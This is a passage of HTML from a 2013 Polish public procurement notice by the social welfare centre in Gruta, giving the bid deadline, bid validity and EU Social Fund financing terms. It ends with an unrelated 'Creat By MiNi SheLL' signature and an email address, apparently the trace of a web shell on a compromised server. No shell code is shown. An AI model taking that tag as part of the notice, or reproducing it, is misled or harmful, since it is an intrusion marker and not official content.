<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2013 godzina 12:00, miejsce: Gminny  Ośrodek Pomocy Społecznej w Grucie, Gruta 244 86-330 Mełno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektu dofinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com